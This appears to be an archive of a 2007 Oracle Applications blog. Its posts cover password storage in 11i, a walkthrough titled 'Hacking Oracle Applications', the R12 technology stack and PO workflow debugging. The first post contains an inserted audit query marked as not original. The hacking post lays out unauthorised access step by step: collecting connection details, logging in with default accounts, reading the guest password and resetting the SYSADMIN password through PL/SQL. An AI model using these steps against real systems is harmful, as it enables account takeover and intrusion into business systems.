Thursday, November 29, 2007


Oracle APPS Password Security

Oracle Applications 11i implementations have a security weakness: Oracle Applications 11i passwords are stored in the database. Apps passwords are stored in two tables, FND_USER and FND_ORACLE_USERID. The FND_ORACLE_USERID table stores the internal Oracle Applications database accounts. The APPS and APPLSYS database accounts must always have the same password.

The APPS.FND_USER table holds all application accounts and has two encrypted password columns:

  1. ENCRYPTED_FOUNDATION_PASSWORD
  2. ENCRYPTED_USER_PASSWORD

Either of these two columns may instead contain one of the following string values:

  1. EXTERNAL: user authentication is delegated, so the password is not stored in the FND_USER table.
  2. INVALID: access to some default Oracle Apps accounts is blocked by directly updating the FND_USER table.
  3. X: means the same as INVALID.
  4. ZG: if the encryption algorithm fails, the error message is stored in the password column.
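
An audit query built on the states listed above, as an added example that is not part of the original post: it classifies both password columns per account and flags accounts that need review, without ever selecting the stored values. The sample rows and account names are constructed; matching failure markers with LIKE 'ZG%' and treating a NULL column as EMPTY are assumptions.

```sql
-- Added audit example. The rows in fnd_user_sample are constructed;
-- on a real instance, select the same three columns from APPS.FND_USER.
WITH fnd_user_sample AS (
  SELECT 'SYSADMIN'                 AS user_name,
         'CONSTRUCTED_CIPHERTEXT_A' AS encrypted_foundation_password,
         'CONSTRUCTED_CIPHERTEXT_B' AS encrypted_user_password
    FROM dual UNION ALL
  SELECT 'SSO_USER', 'EXTERNAL', 'EXTERNAL' FROM dual UNION ALL
  SELECT 'OLD_SEED_ACCOUNT', 'INVALID', 'X' FROM dual UNION ALL
  SELECT 'BROKEN_ACCOUNT', 'CONSTRUCTED_CIPHERTEXT_C', 'ZG' FROM dual
),
-- One row per (account, password column) so a single CASE covers both columns.
password_columns AS (
  SELECT user_name, 'ENCRYPTED_FOUNDATION_PASSWORD' AS column_name,
         encrypted_foundation_password AS stored_value
    FROM fnd_user_sample
  UNION ALL
  SELECT user_name, 'ENCRYPTED_USER_PASSWORD', encrypted_user_password
    FROM fnd_user_sample
),
classified AS (
  SELECT user_name, column_name,
         CASE
           WHEN stored_value IS NULL             THEN 'EMPTY'
           WHEN stored_value = 'EXTERNAL'        THEN 'DELEGATED'
           WHEN stored_value IN ('INVALID', 'X') THEN 'BLOCKED'
           WHEN stored_value LIKE 'ZG%'          THEN 'ENCRYPTION_FAILED'
           ELSE 'ENCRYPTED'
         END AS state
    FROM password_columns
)
-- The stored values themselves are never returned, only their state.
SELECT user_name,
       MAX(CASE WHEN column_name = 'ENCRYPTED_FOUNDATION_PASSWORD'
                THEN state END) AS foundation_state,
       MAX(CASE WHEN column_name = 'ENCRYPTED_USER_PASSWORD'
                THEN state END) AS user_state,
       CASE
         WHEN COUNT(DISTINCT state) > 1
           OR SUM(CASE WHEN state IN ('ENCRYPTION_FAILED', 'EMPTY')
                       THEN 1 ELSE 0 END) > 0
         THEN 'REVIEW'   -- columns disagree, or a failure marker / empty value
         ELSE 'OK'
       END AS verdict
  FROM classified
 GROUP BY user_name
 ORDER BY verdict DESC, user_name;
```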

The passwords in FND_ORACLE_USERID are maintained independently of the database, so any changes made to the account passwords with ALTER USER statements are not reflected in the table. Passwords in FND_ORACLE_USERID can be changed with the FNDCPASS utility or the sysadmin “ORACLE Form”.

Oracle Applications passwords can be 1 to 100 characters long; longer passwords are truncated at 100 characters.

Oracle Apps password encryption is done by APPS.FND_WEB_SEC or by the Java classes:

  • oracle.apps.fnd.security.WebSessionManagerProc
  • oracle.apps.fnd.security.AolSecurity
  • oracle.apps.fnd.security.AolSecurityPrivate

You can find these classes under the $JAVA_TOP directory.

You can download the class and, using a Java class converter, see how the code is written. The actual encryption and decryption calls are in the “oracle.apps.fnd.security.AolSecurityPrivate” Java class. The Guest account password is stored in a system profile. You can retrieve it with:

select APPS.FND_PROFILE.VALUE('GUEST_USER_PWD') from dual;

Wednesday, November 28, 2007

Tracing TNS Entries (Hacking Oracle Applications)
How to get TNS entries from the front page of the Oracle Applications screen.




Step 1: Click on the About page link. You will then see the following screen.
Step 2: Click on the Page Context tab.





You are able to get the following information:
1) Database name (hostname)
2) Port number
3) SID name
Step 3: Build a TNS entry using the following template and paste it on the local machine.
Try to connect with the default password apps/apps.


"SID"=
(DESCRIPTION =
(ADDRESS_LIST = (ADDRESS = (PROTOCOL = TCP)
(HOST = "Host Name")
(PORT = "Port number")) )
(CONNECT_DATA =
(SERVICE_NAME ="SID" )
) )

  • Connect with the default username/password:
APPLSYSPUB/PUB

This username/password is hard-coded in the FND_TOP/secure/appsweb.cfg file.

  • Once you have database access, use the following SELECT statement to get the front-end URL:

select HOME_URL from icx_parameters;

You will get the front-end login screen.
Using the APPS.FND_WEB_SEC package, change the SYSADMIN or user password at the SQL prompt.

Example 1:
-- Change the SYSADMIN password from PL/SQL
set serveroutput on
declare
  ret varchar2(200);
begin
  ret := fnd_web_sec.change_password('SYSADMIN', 'Welcome1');
  -- Y means success, anything else means failure.
  dbms_output.put_line('Result of Package: ' || ret);
end;
/
commit;


Step 4: Finally, click on Java System Properties and scroll down the page. You will be able to see the Unix login user name (back-end user access).
Step 5: Try to connect to the Unix server with the default password.



Sunday, November 11, 2007

The technology stack for Release 12
The technology stack for Release 12 takes advantage of the latest Oracle technologies for the database and application server tiers. These components are installed in the ORACLE_HOME directories, while other components are rehosted in the APPL_TOP.

Oracle Technology Components

Oracle Database 10g - 10.2
XDK (Database) - 10.1.0.4
XDB - 10.1.0.4
XDK (Application tier) - 10.1.3
Oracle HTTP Client - 10.1.3
Oracle Application Server - 10.1.2 and 10.1.3
Developer Client Libraries - 10.1.0.4.2
Oracle Database iAS Client Libraries - 10.1.0.4.2
Oracle HTTP Server - 10.1.3
Oracle JDeveloper - 10.1.3
OracleAS Discoverer 10g - 10.1.2.0.2
OJSP - 2.0

The Rehosted Components are:

BI Beans - 3.1
JDBC - 10.2
JDK for Web tier - 5.0
JDK for concurrent processing tier - 5.0
Sun Java Plug-in - 5.0

The Non-Embedded Applications Integration Components:
These components all provide newer versions of Java-related features and technologies.

OracleAS 10g Portal - 10.1.4
OracleAS 10g Single Sign-On and Oracle Internet Directory - 10.1.2.0.2
Oracle Collaboration Suite - 10g Release 1
Oracle Enterprise Manager - 10g Release 1

Friday, November 02, 2007

PO Workflow Debug
The following is exceptionally useful when trying to diagnose a problem encountered during workflow execution, in particular for determining why a section of code is failing.
Step 1) Clear any existing debug entries:
truncate table po_wf_debug;
Step 2) Set the profile option ‘PO: Set Debug Workflow ON’ to Yes, then reproduce the issue.
Step 3) Run the following query:
SELECT document_id,
       document_number,
       authorization_status,
       debug_message
FROM po_wf_debug;
Optionally add itemtype and itemkey to limit the data returned.